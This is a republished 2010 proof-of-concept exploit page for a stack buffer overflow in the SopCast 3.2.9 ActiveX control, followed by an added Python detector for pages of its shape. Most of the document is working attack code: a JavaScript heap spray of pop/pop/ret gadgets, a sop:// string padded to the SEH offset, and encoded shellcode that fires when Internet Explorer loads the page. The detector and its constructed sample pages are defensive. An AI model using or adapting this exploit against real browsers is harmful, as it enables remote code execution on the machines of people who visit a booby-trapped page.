SopCast New 0Day Remote Exploit
Source: Author: Sud0 Published: 2010-08-11

<html>
<Center>
<H1>Sopcast POC by Sud0<br></H1>
<b>Tested on XP SP3 EN on VBox with IE 7<br>
Spraying a lot to get a nice unicode-usable address 0x20260078<br>
I sprayed with a set of P/P/R instructions to come back to the stack<br>
***Need internet connection on the box to trigger the vuln***<br>
Wait for the spray to finish (IE will seem frozen for some seconds)<br>
The SopCast control will be loaded and shown on the page<br>
Wait approx 3 to 5 seconds and a message box should appear<br>
</b>
</Center>
<!--
# Exploit Title : SopCast BOF
# Date          : August 10, 2010
# Author        : Sud0
# Bug found by  : Sud0
# Software Link : http://www.sopcast.com - http://www.easetuner.com
# Version       : 3.2.9
# OS            : Windows
# Tested on     : XP SP3 En (VirtualBox) Fully Patched, Internet Explorer 7
# Type of vuln  : Stack Buffer Overflow - SEH
# Advisory      : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-059
# Big thanks to : my wife for supporting me
# Greetz to     : Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
 

|------------------------------------------------------------------|
|                         __               __                      |
|   _________  ________  / /___ _____     / /____  ____ _____ ___  |
|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
|                                                                  |
|                                       http://www.corelan.be:8800 |
|                                              security@corelan.be |
|                                                                  |
|-------------------------------------------------[ EIP Hunters ]--|

 Script provided 'as is', without any warranty.
 Use for educational purposes only.
 Do not use this code to do anything illegal !
 Corelan does not want anyone to use this script
 for malicious and/or illegal purposes
 Corelan cannot be held responsible for any illegal use.

 Note : you are not allowed to edit/modify this code. 
 If you do, Corelan cannot be held responsible for any damages this may cause.

 

-->

<object classid='clsid:8FEFF364-6A5F-4966-A917-A3AC28411659' id='boom' ></object>
<script>
// ######################################### Begin of spraying with (nops + Pop/Pop/Ret) instructions to come back to the stack

var nops = unescape("%49%41");  // some nice nops on ECX
var ppr = unescape("%49%58%49%58%49%c3");  // Pop EAX / pop EAX / Ret
var ppraddy = 0x20260078;
var BlockSize = 0x200000;
var BlockHeaderSize = 0x26;
var PPRSize = 0x6;
var nopSize = BlockSize - (PPRSize + BlockHeaderSize);
var heapBlocks = (ppraddy+BlockSize*2)/(BlockSize*2);
var Spray = new Array();
while (nops.length < nopSize)
{
    nops += nops;
}
nops = nops.substring(0, nopSize);
for (i = 0; i < heapBlocks; i++)
{
    Spray[i] = nops + ppr;
}
// ######################################### end of spraying

var buffSize = 522;   // (516 + 6 = sop:// ) offset to overwrite EIP
var x = "sop://";
while (x.length < buffSize) x += unescape("%41");
x += unescape("%41");
x += unescape("%41");
x += unescape("%87");  // low unicode bytes of seh destination address 0035 (0x20260087)
x += "…";  // High unicode bytes of seh destination address 2026 (0x20260087)
x += unescape("%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49");
x += unescape("%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A");
x += unescape("%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49");
x += unescape("%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%5A%49%52%49%c3");

// some junk before shellcode
for (i = 0; i < 330; i++)
{
    x += unescape("%41");
}

// messagebox shellcode
x+="RRYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIA";
x+="IQI111AIAJQYAZBABABABABkMAGB9u4JBfyjK3kXYRTLdKDNQyBx2pzlqGYS4DKPqlpBkQfzl2kpvMLTKq6LH4KqnmP";
x+="TKMfNXNoLXrUL3Ny9qXQKOYQc0bkplo4nDrk15oLTKPTKUD8KQXj2kMzlX4K1JkpyqjK7sp7OY4KMdtKKQZNLqIomaw";
x+="PilVLRdWPBTlJ6a6olMJawWHil1YoKOKOmk3LKtMXSEgnRkojO4YqZK0fBkzlpKRkqJKlm1JKdKitRkkQxhe9oTLdML";
x+="31es6RKXKywdsY9UCYfbOx2npNZnzLpR8h5LkOKOkOQyQ5kT5kSNj8yRBSSWmLo4nrxhdKKOKOKOe9oUkXoxRLplMPK";
x+="O1XLsnRnNs41Xaet3REbRQx1LmTkZSYK6pVKOPULDqyWRPPWKSxg2Nm5lQwklktPRYXqN9okOYo38PlaQPnQH2HPCrO";
x+="2RqUNQ9KrhqLMTlG1yGsQXnPpXkpKp1XKpNs45s4OxQTmPOrQiQXpoOysDouQXMucHRPPllqWYrhPLktKaQy7qNQ6rN";
x+="rpSpQqBkOvpNQgPB0ioNuyxkZA";

// some junk after shellcode
for (i = 0; i < 40000; i++)
{
    x += unescape("%41");
}

// calling the boom
boom.ChannelName = x; // setting channel name
boom.SetSopAddress(x); // getting address to trigger the boom

</script>
</html>
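As an added defensive example (not part of the original exploit or of SopCast), the following Python checks an HTML document for the combination this page relies on: the SopCast control's CLSID, the heap-spray idiom (unescape()'d fragments doubled in a loop into an Array), and a sop:// string padded to the 522-byte SEH offset. The two sample pages embedded in it are constructed and shortened, not the original file.

```python
import re

# CLSID of the SopCast ActiveX control instantiated by the page above.
SOPCAST_CLSID = "8FEFF364-6A5F-4966-A917-A3AC28411659"
# The page states that 522 bytes ("sop://" plus padding) reach the SEH record.
SOP_URL_OVERFLOW_LEN = 522
# Heap-spray idiom from the page: unescape()'d fragments doubled in a loop into an Array.
SPRAY_PATTERNS = [
    re.compile(r"\bunescape\s*\(\s*['\"]%[0-9a-f]{2}", re.I),  # unescape("%49%41")
    re.compile(r"\b(\w+)\s*\+=\s*\1\s*;"),                   # nops += nops;
    re.compile(r"\bnew\s+Array\s*\(", re.I),                 # var Spray = new Array()
]

def _resolve(token, js):
    """Numeric literal, or the value of a 'var NAME = <number>' declaration (0 if unknown)."""
    m = re.search(r"\bvar\s+%s\s*=\s*(\d+)" % re.escape(token), js)
    return int(token) if token.isdigit() else (int(m.group(1)) if m else 0)

def sop_url_lengths(js):
    """Lengths that sop:// strings are padded to by a 'while (v.length<N)' loop."""
    lengths = []
    for m in re.finditer(r"\b(\w+)\s*=\s*['\"]sop://", js):
        pad = re.search(r"while\s*\(\s*%s\.length\s*<\s*(\w+)\s*\)" % re.escape(m.group(1)), js)
        lengths.append(_resolve(pad.group(1), js) if pad else len("sop://"))
    return lengths

def analyse(html):
    """Return the list of indicators found in one HTML document."""
    findings = []
    if SOPCAST_CLSID.lower() in html.lower():
        findings.append("sopcast_control")
    if sum(1 for p in SPRAY_PATTERNS if p.search(html)) >= 2:
        findings.append("heap_spray_idiom")
    if any(n >= SOP_URL_OVERFLOW_LEN for n in sop_url_lengths(html)):
        findings.append("oversized_sop_url")
    return findings

def is_exploit_like(html):
    """True when the control is loaded together with a spray or an oversized sop:// string."""
    f = analyse(html)
    return "sopcast_control" in f and ("heap_spray_idiom" in f or "oversized_sop_url" in f)

# Constructed, shortened page in the shape of the exploit above (not the original file).
SAMPLE_EXPLOIT = """<object classid='clsid:8FEFF364-6A5F-4966-A917-A3AC28411659' id='boom'></object>
<script>var nops = unescape("%49%41"); var Spray = new Array(); while (nops.length<0x1000) { nops += nops; }
var buffSize = 522; var x="sop://"; while (x.length<buffSize) x += unescape("%41"); boom.SetSopAddress(x);</script>"""
# Constructed benign page: same control, an ordinary channel address, no spray.
SAMPLE_BENIGN = """<object classid='clsid:8FEFF364-6A5F-4966-A917-A3AC28411659' id='p'></object>
<script>var url="sop://broker.example/channel"; p.SetSopAddress(url);</script>"""
```

A page that merely embeds the control with a normal channel address is reported as loading the control but not as exploit-like; the spray idiom or the padded sop:// string has to be present as well.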


CopyRight © 2002-2022 VFocuS.Net All Rights Reserved